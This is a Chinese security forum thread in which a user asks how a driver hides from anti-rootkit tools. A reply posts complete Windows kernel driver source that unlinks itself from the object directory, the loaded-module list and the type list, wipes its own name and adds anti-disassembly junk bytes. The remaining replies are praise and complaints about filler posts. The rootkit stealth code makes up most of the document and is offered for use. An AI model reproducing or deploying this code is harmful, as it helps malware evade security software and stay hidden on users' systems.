注册日期: Apr 2004
都老鸟了啊。

补充一下
系统
装了360卫士和360杀毒
两个程序

pool hook,二级跳~

pool hook是啥?二级跳是啥?
谷歌pool hook,搜出swimming pool hook 加了个"驱动",还是搜不出~~唉~~~
搜索下驱动隐藏,也没搜出来.
大大再提示点~~~

申请POOL，把基本的处理代码放到这个POOL中，在这个POOL中再完成跳转之类的。。。这样就使一些ARK显示为UNKNOW IMAGE了。。。跟驱动隐藏是不一样的。。。
发个驱动隐藏的例子给你吧。。。

#include "ntddk.h"
#include "HideModule.h"

//////// http://hi.baidu.com/sysnap   2008
//隐藏驱动管理对象导出的接口
void ObHideFromTypeList();
void ObHideFromDriverObjectName();
void ObHideFromPsLoadedModuleList();
void ObHideFromFileInfo();
void ObHideFromObjectDirectory(POBJECT_DIRECTORY pObjDir);

#define ANTI_RESERVE_A() \
__asm{_emit 0xff};\
__asm{_emit 0x74};\
__asm{_emit 0x51};\
__asm{_emit 0xe8};\
__asm{_emit 0x00};

typedef struct _Hide_Module
{
        PDRIVER_OBJECT HideDriverObject;
        void (*ObHideFromTypeList)();
        void (*ObHideFromDriverObjectName)();
        void (*ObHideFromPsLoadedModuleList)();
        void (*ObHideFromFileInfo)();
        void (*ObHideFromObjectDirectory)(POBJECT_DIRECTORY pObjDir);
       

}Hide_Module;

Hide_Module HideModuleObjectManager;

void InitializeHideModuleObjectManager(PDRIVER_OBJECT HideDriverObject)
// HideModuleObjectManager需要先调用InitializeArrayObjectMamager初始化才能使用
{
        HideModuleObjectManager.HideDriverObject  = HideDriverObject;
        HideModuleObjectManager.ObHideFromDriverObjectName = ObHideFromDriverObjectName;
        HideModuleObjectManager.ObHideFromFileInfo = ObHideFromFileInfo;
        HideModuleObjectManager.ObHideFromObjectDirectory = ObHideFromObjectDirectory;
        HideModuleObjectManager.ObHideFromPsLoadedModuleList = ObHideFromPsLoadedModuleList;
        HideModuleObjectManager.ObHideFromTypeList = ObHideFromTypeList;
}

POBJECT_DIRECTORY_ENTRY
ObpUnlinkDirectoryEntry (
    IN POBJECT_DIRECTORY Directory,
    IN ULONG HashIndex
    )
{
    POBJECT_DIRECTORY_ENTRY *HeadDirectoryEntry;
    POBJECT_DIRECTORY_ENTRY DirectoryEntry;

    //
    //  The lookup path places the object in the front of the list, so basically
    //  we find the object immediately
    //

    HeadDirectoryEntry = (POBJECT_DIRECTORY_ENTRY *)&Directory->HashTable[ HashIndex ];
        DirectoryEntry = *HeadDirectoryEntry;

    //
    //  Unlink the entry from the head of the bucket chain and free the
    //  memory for the entry.
    //

    *HeadDirectoryEntry = DirectoryEntry->NextEntry;
    DirectoryEntry->NextEntry = NULL;
        return DirectoryEntry;
}

FORCEINLINE
POBJECT_HEADER_CREATOR_INFO
OBJECT_HEADER_TO_CREATOR_INFO (
    IN POBJECT_HEADER ObjectHeader
    )
{
    POBJECT_HEADER_CREATOR_INFO creatorInfo;

    if ((ObjectHeader->Flags & OB_FLAG_CREATOR_INFO) != 0) {
        creatorInfo = ((POBJECT_HEADER_CREATOR_INFO)ObjectHeader) - 1;
        __assume(creatorInfo != NULL);
    } else {
        creatorInfo = NULL;
    }

    return creatorInfo;
}

#define DELAY_ONE_MICROSECOND         (-10)
#define DELAY_ONE_MILLISECOND        (DELAY_ONE_MICROSECOND*1000)
VOID ObSleep(LONG msec)
        {
                LARGE_INTEGER my_interval;
                my_interval.QuadPart = DELAY_ONE_MILLISECOND;
                my_interval.QuadPart *= msec;
                KeDelayExecutionThread(KernelMode,0,&my_interval);
        }

//PDRIVER_OBJECT g_pDriverObject;

void ObHideFromObjectDirectory(POBJECT_DIRECTORY pObjDir) //父节点 pObjDir
{
        POBJECT_DIRECTORY_ENTRY pDirectoryEntry,pEntryPrev = NULL;
        POBJECT_HEADER pObjectHeader;
        PVOID Object;
        int i;
        PUNICODE_STRING unipObjectTypeName,uniHideDriveName;
        POBJECT_DIRECTORY tmpObjDir,pDirectory;
       
        pDirectory = pObjDir;
        KeEnterCriticalRegion( );
       
        for(i = 0; i < 36; i ++)  //DIR对象的对象体(BODY)是37个元素的数组。
        {
                pDirectoryEntry = pDirectory->HashTable[i];  //子根目录
                // DbgPrint("---0x%x\n", pDirectoryEntry);
                if(HideModuleObjectManager.HideDriverObject == (PVOID)11)
        {
                ANTI_RESERVE_A();
        }
                while(pDirectoryEntry)
                {
                        __try{
                                if(pDirectoryEntry)
                                {
                                        Object = pDirectoryEntry->pObject ; //根目录对象
                                    pObjectHeader = OBJECT_TO_OBJECT_HEADER( Object ); //根目录对象头
                                    unipObjectTypeName = (PUNICODE_STRING)((*(ULONG*)((ULONG)pObjectHeader+8)+0x40));
                                        //这里可以输出很多类型的对象,但我们关心的是Driver
                                        if(HideModuleObjectManager.HideDriverObject == Object)
                                                ObpUnlinkDirectoryEntry (pDirectory,i);
                                       
                                        if(wcscmp(unipObjectTypeName->Buffer,L"Directory")==0)
                                        {
                                                tmpObjDir = Object;
                                            ObHideFromObjectDirectory( tmpObjDir);  //如果对象的类型是"Directory" 递归处理之
                                        }
                                }
                                pEntryPrev = pDirectoryEntry;
                                pDirectoryEntry = pDirectoryEntry->NextEntry;
                        }__except(EXCEPTION_EXECUTE_HANDLER)
                        {
                       
                        }
                }
        }
       
        KeLeaveCriticalRegion();

}

void ObHideFromPsLoadedModuleList()
{
        DRIVER_DATA* driverData;
        driverData = *((DRIVER_DATA**)((ULONG)HideModuleObjectManager.HideDriverObject + 20));
        if( driverData != NULL )
        {
                *((PULONG)driverData->listEntry.Blink) = (ULONG)driverData->listEntry.Flink;
                driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
        }
}

void ObHideFromDriverObjectName()
{
        // +0x01c DriverName       : _UNICODE_STRING
        PUNICODE_STRING ObDriverName;
        ObDriverName = (PUNICODE_STRING)((ULONG)HideModuleObjectManager.HideDriverObject+0x1c);
        RtlZeroMemory(ObDriverName->Buffer,ObDriverName->Length);
        ObDriverName->Length = 0;
        ObDriverName->MaximumLength = 0;
}

void ObHideFromTypeList()
{
    POBJECT_HEADER ObjectHeader;
    POBJECT_HEADER_CREATOR_INFO CreatorInfo;
        PVOID Object;
/*        if(HideModuleObjectManager.HideDriverObject == (PVOID)11)
        {
                ANTI_RESERVE_A();
        }*/
        Object = (PVOID)HideModuleObjectManager.HideDriverObject;
        ObjectHeader =  OBJECT_TO_OBJECT_HEADER(Object);
        CreatorInfo = OBJECT_HEADER_TO_CREATOR_INFO(ObjectHeader);
    if (CreatorInfo != NULL)
    {
                DbgPrint("---hi type list!!");
        RemoveEntryList(&CreatorInfo->TypeList);
        InitializeListHead(&CreatorInfo->TypeList);
    }
}

void ObHideFromFileInfo()
{
        char * str = "插PE相关信息用,先保留";
        PUNICODE_STRING ObDriverName;
        PLDR_DATA_TABLE_ENTRY  ObDriverSection;
        PVOID DriverBase;
        ObDriverSection = (PLDR_DATA_TABLE_ENTRY)HideModuleObjectManager.HideDriverObject->DriverSection;
        DriverBase = ObDriverSection->DllBase;
}

void ObHideTestThread()
{
        while(1)
        {
                ObSleep(3000);
                DbgPrint(" Im Runing!!");
               
        }
        PsTerminateSystemThread(STATUS_SUCCESS);

}

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
       
}

ULONG g=0;
void test()
{
        g++;
        if(g==2)
        {
                ANTI_RESERVE_A();

        }
/*
VOID ModuleHide()
{
           PUNICODE_STRING ObDriverName;
        PUNICODE_STRING BaseDllName;
        PLDR_DATA_TABLE_ENTRY  ObDriverSection;
        ObDriverSection = (PLDR_DATA_TABLE_ENTRY)HideModuleObjectManager.HideDriverObject->DriverSection;

        DbgPrint(" %x  %ws",ObDriverSection->DllBase,ObDriverSection->BaseDllName.Buffer);
        ObDriverName = (PUNICODE_STRING)&ObDriverSection->FullDllName;
        RtlZeroMemory(ObDriverName->Buffer,ObDriverName->Length);
        ObDriverName->Length = 0;
        ObDriverName->MaximumLength = 0;

/*        BaseDllName = (PUNICODE_STRING)&ObDriverSection->BaseDllName.Buffer;
        RtlZeroMemory(BaseDllName->Buffer,ObDriverName->Length);
        BaseDllName->Length = 0;
        BaseDllName->MaximumLength = 0;
*/

//        DbgPrint(" %x  %ws",ObDriverSection->DllBase,ObDriverSection->BaseDllName.Buffer);

      
}
*/

}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath)
{
        UNICODE_STRING usDirName;
    OBJECT_ATTRIBUTES oaDirName;
    HANDLE hDir = NULL;
    POBJECT_DIRECTORY pDir = NULL;
    POBJECT_DIRECTORY_ENTRY pEntry, pEntryPrev;
    NTSTATUS status;
    ULONG i;
        HANDLE hThread=0;

        test();
        if(g==0)
        {
                ANTI_RESERVE_A();
        }
               
        InitializeHideModuleObjectManager(pDriverObject);
       
        RtlInitUnicodeString(&usDirName, L"\\Driver");
    InitializeObjectAttributes(&oaDirName, &usDirName, OBJ_CASE_INSENSITIVE, NULL, NULL);
    status = ObOpenObjectByName(&oaDirName, NULL, KernelMode, NULL, GENERIC_READ, NULL, &hDir);
        if(NT_SUCCESS(status))
        {
                status = ObReferenceObjectByHandle(hDir, FILE_ANY_ACCESS, NULL, KernelMode, &pDir, NULL);
                if(NT_SUCCESS(status))
                {
                        HideModuleObjectManager.ObHideFromObjectDirectory(pDir);
                        ObDereferenceObject(pDir);
                        ZwClose(hDir);
                }
        }

        HideModuleObjectManager.ObHideFromDriverObjectName();
        HideModuleObjectManager.ObHideFromFileInfo();
        HideModuleObjectManager.ObHideFromPsLoadedModuleList();
        HideModuleObjectManager.ObHideFromTypeList();

        PsCreateSystemThread(&hThread,0L,NULL,NULL,NULL,(PKSTART_ROUTINE)ObHideTestThread,NULL);
        if(hThread)
        ZwClose(hThread);

        pDriverObject->DriverUnload = OnUnload;
        return STATUS_SUCCESS;
       

}

很好，不错！

学习下，膜拜。

qqq

6 楼的大哥厉害啊。学习！！

膜拜sysnap大牛··

6 楼的大哥厉害啊。学习！

没趣，全MT的水，这种无意义的回复，怎么没人处理下

会员:请注意你的言语.

TRY IT.

这里就是很水了 呵呵。比较少讨论氛围